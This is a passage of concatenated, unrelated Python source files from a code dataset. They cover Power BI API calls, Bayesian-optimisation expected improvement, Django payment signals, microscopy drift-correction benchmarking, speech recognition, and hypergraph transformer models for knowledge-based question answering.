api_response = requests.get(endpoint_url, headers=self.headers)
return api_response
def get_gateway(self, access_token, gateway_id):
''' Returns the gateway information
Args:
access_token (str): Access token to call API
gateway_id (str): Gateway Id
Returns:
Response: Response from the API call
'''
self.headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + access_token}
endpoint_url = f'https://api.powerbi.com/v1.0/myorg/gateways/{gateway_id}'
api_response = requests.get(endpoint_url, headers=self.headers)
return api_response
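
# Minimal usage sketch (not part of the original file); the token and IDs below are
# placeholders that would come from Azure AD and the Power BI workspace in practice.
if __name__ == '__main__':
    service = GetDatasourceService()
    datasources_response = service.get_datasources_in_group(
        access_token='<aad-access-token>',
        group_id='<workspace-id>',
        dataset_id='<dataset-id>',
    )
    print(datasources_response.status_code)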
| StarcoderdataPython |
180793 | import math
import torch
from HyperSphere.BO.utils.normal_cdf import norm_cdf
def norm_pdf(x, mu=0.0, var=1.0):
return torch.exp(-0.5 * (x-mu) ** 2 / var)/(2 * math.pi * var)**0.5
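# Closed-form expected improvement (for minimization) against a reference value r:
#   EI = sigma * phi(z) + (r - mu) * Phi(z), with z = (r - mu) / sigma, clamped at 0,
# where phi is the Gaussian pdf above and Phi is the imported norm_cdf approximation.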
def expected_improvement(mean, var, reference):
std = torch.sqrt(var)
standardized = (-mean + reference) / std
return (std * norm_pdf(standardized) + (-mean + reference) * norm_cdf(standardized)).clamp(min=0)
if __name__ == '__main__':
import matplotlib.pyplot as plt
from scipy.stats import norm
x = torch.linspace(2, 3, 200)
y1 = norm_cdf(x)
y2 = norm.cdf(x.numpy())
plt.plot(x.numpy(), y1.numpy(), label='approximate')
plt.plot(x.numpy(), y2, ':', label='exact')
z1 = norm_pdf(x)
z2 = norm.pdf(x.numpy())
plt.plot(x.numpy(), z1.numpy(), label='approximate')
plt.plot(x.numpy(), z2, ':', label='exact')
plt.legend()
plt.show()
| StarcoderdataPython |
1738443 | <reponame>Paradigm-shift-AI/paradigm-brain
import requests
import os
class SequenceRearrange:
"""
SequenceRearrange
Class that create SequenceRearrange question, it use the sequence defined in
the plugin and the intersection of the tags discovered in the transcript to
create the question
Arguments:
processed_transcript: dict
"""
    def __init__(self, processed_transcript: dict, tokenid: str = None):
"""
__init__
Arguments:
processed_transcript: dict
"""
self.processed_transcript = processed_transcript
self.question = []
self.tokenid = tokenid
def __generate_question(self):
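        # Fetch the plugin-defined sequences for this token and keep only those whose
        # tags all occur in the transcript's tag intersection; each kept sequence
        # becomes the ordered options of one rearrangement question.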
_req = requests.get(os.environ["PLUGIN_STORE_URL"] + self.tokenid + '/seq')
if _req.status_code == 200:
for i in _req.json()['seq']:
_gh = True
for j in i:
if j not in self.processed_transcript["tag-intersection"]:
_gh = False
break;
if _gh:
_ques = {}
_inde = 1
for j in i:
_ques['option' + str(_inde)] = j
_inde += 1
_ques['score'] = len(i)
_ques['type'] = 5
self.question.append(_ques)
def questions(self):
"""
Returns question in the following format:
{
option1: <>,
option2: <>,
option3: <>,
score: 3,
type: 5
}
"""
if self.tokenid:
self.__generate_question()
return self.question
| StarcoderdataPython |
4805361 | from zabbix_enums.common import _ZabbixEnum
class TaskType(_ZabbixEnum):
DIAGNOSTIC = 1
CHECK_NOW = 6
class TaskStatus(_ZabbixEnum):
NEW = 1
IN_PROGRESS = 2
COMPLETED = 3
EXPIRED = 4
class TaskStatisticResult(_ZabbixEnum):
ERROR = -1
CREATED = 0
| StarcoderdataPython |
3252711 | from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from products.models import Product
from sales.models import SaleItem, Payment, Sale, Shipping
# sale = models.OneToOneField(Sale, on_delete=models.CASCADE)
# amount = models.PositiveIntegerField(default=0)
# payment_type = models.CharField(max_length=100, default=TYPE_BANK_TRANSFER, choices=PAYMENT_TYPES)
# is_paid = models.BooleanField(default=False)
# note = models.TextField()
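# Signal flow: creating a Sale automatically creates its Payment; any later save of the
# Sale, a SaleItem, or a Shipping recalculates the payment amount from Sale.total().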
def update_payment(sale):
payment = Payment.objects.get(sale=sale)
payment.amount = sale.total()
payment.save()
def create_payment(sale):
Payment.objects.create(
sale=sale,
is_paid=False,
amount=sale.total()
)
@receiver(post_save, sender=Sale)
def save_sale(sender, instance, created, **kwargs):
print('Invoke save_sale')
if created:
create_payment(instance)
else:
update_payment(instance)
@receiver(post_save, sender=SaleItem)
def save_saleitem(sender, instance, created, **kwargs):
update_payment(instance.sale)
@receiver(post_save, sender=Shipping)
def save_shipping(sender, instance, created, **kwargs):
# print(instance.sale)
update_payment(instance.sale)
| StarcoderdataPython |
4803567 | <reponame>thagusta/LEEM-analysis
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 3 - Benchmarking
# This notebook explores the performance of the drift correction algorithm as defined in `2 - Driftcorrection` by benchmarking the time it takes to drift-correct stacks of different numbers of images.
# Needed imports
from Registration import *
import shutil
import xarray as xr
import time
from dask.distributed import Client, LocalCluster
import matplotlib.pyplot as plt
import os
import scipy.ndimage as ndi
folder = r'./data'
name = '20171120_160356_3.5um_591.4_IVhdr'
original = xr.open_dataset(os.path.join(folder, name + '_detectorcorrected.nc'), chunks={'time': 1})
original = original.Intensity.data
# Define fftsize used for the drift correction algorithm; actual size of the fft is twice this value.
fftsize = 256 // 2
# Next, we define the grid of parameters for which we will perform the benchmark and the timings we want to save as an empty `xarray.DataArray`.
#
# **Note**: the parameters noted here will run for several hours at least even on reasonably fast hardware.
iters = np.arange(5)
sigmas = [3, 7, 9, 11, 13, 17]
#strides = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 35, 50, 70,])
strides = np.array([35, 50, 70,])
ts = [0,1,2,3,4]
res = xr.DataArray(np.zeros((len(iters), len(sigmas), len(strides), len(ts))),
coords={'i':iters, 'sigma': sigmas, 'strides': strides.astype(np.int32), 't': ts},
dims=['i','sigma', 'strides', 't'])
res.coords
# Before we can start, we connect to the dask-scheduler and upload the used functions
cluster = LocalCluster()
client = Client(cluster)
client.upload_file('Registration.py')
client
# Inferring output dtype is not supported in dask yet, so we need original.dtype here.
@da.as_gufunc(signature="(i,j),(2)->(i,j)", output_dtypes=original.dtype, vectorize=True)
def shift_images(image, shift):
"""Shift `image` by `shift` pixels."""
return ndi.shift(image, shift=shift, order=1)
tstart = time.time()
t = np.zeros((5,))
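# t[0] records the wall-clock offset since tstart; t[1]-t[4] record elapsed time (relative
# to t[0]) after filtering + cross-correlation, thresholding/masking, the shift-vector
# solve, and shifting + writing; the plotting section later diffs these into per-phase times.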
for stride in strides:
for sigma in sigmas:
for i in iters:
t[0] = time.time() - tstart
#start, stride, dE = 40, 1, 10
start, stop, dE = 40, 740, 10
#stop = start + n
Eslice = slice(start, stop, stride)
sliced_data = original[Eslice,...].rechunk({0:dE})
sobel = crop_and_filter(sliced_data,
sigma=sigma, finalsize=2*fftsize)
sobel = sobel - sobel.mean(axis=(1,2), keepdims=True)
Corr = dask_cross_corr(sobel)
weights, argmax = max_and_argmax(Corr)
W, DX_DY = calculate_halfmatrices(weights, argmax, fftsize=fftsize)
t[1] = (time.time() - (t[0]+tstart))
coords = np.arange(sliced_data.shape[0])
coords, weightmatrix, DX, DY, row_mask = threshold_and_mask(0.0, W, DX_DY, coords=coords)
t[2] = (time.time() - (t[0]+tstart))
dx, dy = calc_shift_vectors(DX, DY, weightmatrix)
t[3] = (time.time() - (t[0]+tstart))
shifts = np.stack(interp_shifts(coords, [dx, dy], n=sliced_data.shape[0]), axis=1)
neededMargins = np.ceil(shifts.max(axis=0)).astype(int)
shifts = da.from_array(shifts, chunks=(dE,-1))
padded = da.pad(sliced_data,
((0, 0),
(0, neededMargins[0]),
(0, neededMargins[1])
),
mode='constant'
)
corrected = shift_images(padded.rechunk({1:-1, 2:-1}), shifts)
corrected[:sliced_data.shape[0]].to_zarr(r'./tempresult.zarr', overwrite=True)
t[4] = (time.time() - (t[0]+tstart))
res.loc[dict(i=i,sigma=sigma,strides=stride)] = t
shutil.rmtree(r'tempresult.zarr')
print(f"t_tot = {t[0]:.2f}\nn = {corrected.shape[0]}, times = {t[1:]}")
res.to_netcdf(os.path.join(folder, 'benchmarkresult.nc'))
# ## Plotting
# We can plot the results of either the benchmark run above or the reference results. This is done using the `xarray` plotting interface on the created datasets. First we do some cleaning up and recombination of the data:
data = xr.open_dataarray(os.path.join(folder, 'benchmarkresult_reference.nc')) # One can remove _reference to view newly generated results
data
# +
# We are interested in the times each individual step took,
# instead of the time upto that step which is saved, so take a diff
data = xr.concat([data.isel(t=1), data.isel(t=slice(2,5)).diff(dim='t', label='lower'), data.isel(t=4)], 't')
data.attrs['long_name'] = 'Run time'
data.attrs['units'] = 's'
# Define a nicer 'Phase' of the algorithm dimension instead of 't', as it is saved in the file.
data.coords['Phase'] = ('t', ['Filter+CC', 'Least Squares', 'Shift and write', 'Total'])
data = data.swap_dims({'t': 'Phase'})
data.coords['N'] = ('strides', 700//data.coords['strides'])
data = data.swap_dims({'strides': 'N'})
# -
# And now we are ready to actually plot.
# +
#Take the mean over the iterations
red = data.mean(dim='i', keep_attrs=True)
facetgrid = red.plot.line('.', col='Phase', hue='sigma',
yscale='log', xscale='log', ylim=[0.1, 1000],
figsize=[6,2], alpha=0.8)
# Add guidelines in red for quadratic in green for linear.
facetgrid.axes[0,0].plot(data['N'], 0.0012*data['N']**2, c='red', zorder=0, alpha=0.5)
facetgrid.axes[0,1].plot(data['N'], 0.00025*data['N']**2, c='red', zorder=0, alpha=0.5)
facetgrid.axes[0,1].plot(data['N'], 0.0035*data['N'], c='green', zorder=0, alpha=0.5)
facetgrid.axes[0,2].plot(data['N'], 0.02*data['N'], c='green', zorder=0, alpha=0.5)
facetgrid.axes[0,3].plot(data['N'], 0.0012*data['N']**2, c='red', zorder=0, alpha=0.5)
# Replace default plot titles with a somewhat nicer version
facetgrid.axes[0,0].set_title('Phase:\nFilter & CC')
facetgrid.axes[0,1].set_title('Phase:\nLeast Squares')
facetgrid.axes[0,2].set_title('Phase:\nShift & write')
facetgrid.axes[0,3].set_title('Total')
plt.subplots_adjust(top=0.8, bottom=0.18, left=0.08, wspace=0.1)
#plt.savefig('timebench.pdf')
# -
| StarcoderdataPython |
1727162 | import logging
from unittest import TestCase
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
class TestInit(HvacIntegrationTestCase, TestCase):
def test_read_init_status(self):
read_response = self.client.sys.read_init_status()
logging.debug("read_response: %s" % read_response)
self.assertTrue(expr=read_response["initialized"])
| StarcoderdataPython |
1645821 | <reponame>mustious/iGlass-infinity
import speech_recognition as sr
import os
project_root_path = os.path.abspath(os.path.dirname(__file__))
beep_tone_path = os.path.join(project_root_path, ".tones/beep_ping.wav")
google_keys_path = os.environ.get("google_keys_path")
# checks whether the environment variable value is valid and path exists
google_json_path_exists = isinstance(google_keys_path, str) and os.path.exists(google_keys_path)
if google_json_path_exists:
with open(google_keys_path) as key_json:
google_key = key_json.read()
class SpeechRecognizer:
"""
This module triggers the microphone to accept speech then uses the google api to transcribe it
if google api is not available it uses the wit.ai api
:ivar recognise: instance of the Recognizer() class from the speech-recognition library
:ivar mic: instance of the Microphone() class
"""
def __init__(self):
self.recognise = sr.Recognizer()
self.mic = sr.Microphone()
def beep_sound(self):
"""
adds a beep tone to signify iGlass is waiting for command
"""
try:
if os.path.exists(beep_tone_path):
os.system(f"aplay {beep_tone_path}")
except:
pass
def listen(self):
"""
        Triggers the mic and converts the captured audio to text.
        :var response_google_cloud: transcription from Google Cloud Speech-to-Text
        :var response_google: transcription from the free Google Web Speech API
:return: response
:rtype dict
"""
response = {"success": None,
"error": None}
self.beep_sound()
with self.mic as source:
self.recognise.adjust_for_ambient_noise(source) # reduces noise
voice = self.recognise.listen(source)
try:
if google_json_path_exists:
response_google_cloud = self.recognise.recognize_google_cloud(audio_data=voice, credentials_json=google_key)
response["success"] = response_google_cloud
return response
response_google = self.recognise.recognize_google(audio_data=voice)
response["success"] = response_google
return response
except sr.RequestError:
# network related error
response["fail"] = "Request error please try again"
return response
except sr.UnknownValueError:
"""
occurs when there is silence in speech
this returns a None value which is neglected by the Brain instance
"""
response["fail"] = "Unknown Value Error"
return response
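
# Minimal usage sketch (not part of the original module); assumes a working microphone
# and either Google Cloud credentials or internet access for the Web Speech API.
if __name__ == "__main__":
    recognizer = SpeechRecognizer()
    result = recognizer.listen()
    print(result)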
| StarcoderdataPython |
175094 | import utils
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from modules.transformer import TransformerEncoder
class ClassEmbedding(nn.Module):
def __init__(self, cfg, trainable=True):
super(ClassEmbedding, self).__init__()
idx2vocab = utils.load_files(cfg["DATASET"]["IDX2VOCAB"])
self.n_token = len(idx2vocab)
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.emb = nn.Embedding(self.n_token, self.word_emb_size)
weight_init = utils.load_files(cfg["DATASET"]["GLOVE"]).astype(np.float32)
weight_mat = torch.from_numpy(weight_init)
self.emb.load_state_dict({"weight": weight_mat})
if not trainable:
self.emb.weight.requires_grad = False
def forward(self, x):
emb = self.emb(x)
return emb
class AnswerSelector(nn.Module):
def __init__(self, cfg):
super(AnswerSelector, self).__init__()
self.av2i = utils.load_files(cfg["DATASET"]["AVOCAB2IDX"])
self.len_avocab = len(self.av2i)
self.glove_cands = utils.load_files(cfg["DATASET"]["GLOVE_ANS_CAND"]).astype(
np.float32
)
self.glove_cands = torch.from_numpy(self.glove_cands).cuda()
def forward(self, inputs):
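        # Rank answer candidates by the dot product between the predicted embedding and
        # the precomputed GloVe embeddings of the answer vocabulary, then log-softmax.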
similarity = torch.matmul(inputs, self.glove_cands.transpose(0, 1))
pred = F.log_softmax(similarity, dim=1)
return pred
class HypergraphTransformer(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.abl_only_ga = args.abl_only_ga
self.abl_only_sa = args.abl_only_sa
if "pql" in args.data_name:
self.i2e = ClassEmbedding(cfg, False) # pql : small dataset
else:
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
if self.abl_only_sa != True:
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
if self.abl_only_ga != True:
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
fc_hid_coeff=self.cfg["MODEL"]["FC_HID_COEFF"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
if self.args.abl_only_ga == True:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks_sum = torch.sum(h_k_with_q, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs_sum = torch.sum(h_q_with_k, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
elif self.args.abl_only_sa == True:
h_ks = self.trans_k_mem(he_kg)
h_ks_sum = torch.sum(h_ks, axis=0)
h_qs = self.trans_q_mem(he_ques)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
else: # self.args.abl_only_ga == False and self.args.abl_only_sa == False:
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_wohe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_wohe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_ans = cfg["MODEL"]["NUM_ANS"]
self.max_num_hqnode = 1
self.max_num_hknode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
if self.args.abl_ans_fc != True:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.ans_selector = AnswerSelector(cfg)
else:
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_ans)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
if self.args.abl_ans_fc != True:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = self.ans_selector(output)
else:
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)),
p=self.out_dropout,
training=self.training,
)
)
pred = F.log_softmax(output, dim=1)
return pred
class HypergraphTransformer_qsetkhe(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qsetkhe, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hqnode = 1
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HypergraphTransformer_qhekset(nn.Module):
def __init__(self, cfg, args):
super(HypergraphTransformer_qhekset, self).__init__()
self.cfg = cfg
self.args = args
self.n_hop = args.n_hop
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hknode = 1
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.trans_k_with_q = self.get_network(self_type="kq")
self.trans_q_with_k = self.get_network(self_type="qk")
self.trans_k_mem = self.get_network(self_type="k_mem", layers=3)
self.trans_q_mem = self.get_network(self_type="q_mem", layers=3)
self.proj1 = nn.Linear(2 * self.n_hidden, self.n_hidden)
self.proj2 = nn.Linear(self.n_hidden, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.out_dropout = 0.0
self.ans_selector = AnswerSelector(cfg)
def get_network(self, self_type="", layers=-1):
if self_type in ["kq", "k_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_K"]
elif self_type in ["qk", "q_mem"]:
embed_dim, attn_dropout = self.n_hidden, self.cfg["MODEL"]["ATTN_DROPOUT_Q"]
else:
raise ValueError("Unknown network type")
return TransformerEncoder(
embed_dim=embed_dim,
num_heads=self.cfg["MODEL"]["NUM_HEAD"],
layers=max(self.cfg["MODEL"]["NUM_LAYER"], layers),
attn_dropout=attn_dropout,
relu_dropout=self.cfg["MODEL"]["RELU_DROPOUT"],
res_dropout=self.cfg["MODEL"]["RES_DROPOUT"],
embed_dropout=self.cfg["MODEL"]["EMB_DROPOUT"],
attn_mask=self.cfg["MODEL"]["ATTN_MASK"],
)
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_kg = he_kg.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_kg = torch.reshape(self.i2e(he_kg), (num_batch, num_he_kg, -1))
he_ques = self.q2h(he_ques)
he_kg = self.k2h(he_kg)
he_ques = self.dropout(he_ques)
he_kg = self.dropout(he_kg)
he_ques = he_ques.permute(1, 0, 2)
he_kg = he_kg.permute(1, 0, 2)
h_k_with_q = self.trans_k_with_q(he_kg, he_ques, he_ques)
h_ks = self.trans_k_mem(h_k_with_q)
h_ks_sum = torch.sum(h_ks, axis=0)
h_q_with_k = self.trans_q_with_k(he_ques, he_kg, he_kg)
h_qs = self.trans_q_mem(h_q_with_k)
h_qs_sum = torch.sum(h_qs, axis=0)
last_kq = torch.cat([h_ks_sum, h_qs_sum], dim=1)
output = self.proj2(
F.dropout(
F.relu(self.proj1(last_kq)), p=self.out_dropout, training=self.training
)
)
pred = self.ans_selector(output)
return pred
class HAN(nn.Module):
def __init__(self, cfg, args):
super(HAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = cfg["MODEL"]["NUM_MAX_KNODE_{}H".format(self.n_hop)]
self.max_num_hqnode = cfg["MODEL"]["NUM_MAX_QNODE"]
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src):
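        # Co-attention over hyperedges: project question/KG hyperedge features, form an
        # (n_question x n_kg) outer-product tensor, map it to n_head attention maps with
        # h2att, softmax jointly over all pairs, then bilinearly pool both feature sets
        # with each head's map and concatenate the resulting glimpses.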
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
